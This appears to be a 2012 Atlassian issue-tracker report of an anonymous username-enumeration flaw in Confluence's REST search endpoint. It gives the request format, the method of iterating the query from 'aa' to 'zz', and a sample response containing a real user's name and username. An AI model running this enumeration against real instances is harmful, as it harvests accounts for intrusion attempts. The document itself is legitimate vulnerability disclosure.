The vulnerability exists in the standalone product and also in the online demonstration environment.

2012-04-24T13:41:00
ID ATLASSIAN:CONFSERVER-25322
Type atlassian
Reporter sruwhof
Modified 2018-10-11T08:37:32

Description

It is possible to anonymously enumerate all usernames via the script at /rest/prototype/1/search/user.json?max-results=10&query=XX. The 'query' GET parameter must contain at least two characters, so all usernames can be enumerated by iterating the 'query' value from 'aa' to 'zz'.


When the following GET request is made:

{noformat}
GET /rest/prototype/1/search/user.json?max-results=10&query=si HTTP/1.1
Host: confluence.atlassian.com
{noformat}

The following answer is given:

{noformat}
HTTP/1.1 200 OK
Date: Tue, 24 Apr 2012 13:32:11 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/json
Keep-Alive: timeout=3, max=20
Connection: Keep-Alive
Content-Length: 11707

{"totalSize":846,"result":[{"id":"254738536","type":"user","title":"Harshil Singhal","wikiLink":"[~hs39867]","createdDate":{"friendly":"Aug 22, 2011","date":"2011-08-22T21:52:45-0500"},"creator":{"links":[{"href":"https://confluence.atlassian.com/rest/prototype/1/user/system/anonymous","rel":"self"}],"avatarUrl":"/s/en_GB/3277/16//images/icons/profilepics/anonymous.png","anonymous":true,"displayName":"Anonymous"},"lastModifier":{"links":[{"href":"https://confluence.atlassian.com/rest/prototype/1/user/system/anonymous","rel":"self"}],"avatarUrl":"/s/en_GB/3277/16//images/icons/profilepics/anonymous.png","anonymous":true,"displayName":"Anonymous"},"username":"hs39867","thumbnailLink": [..]
{noformat}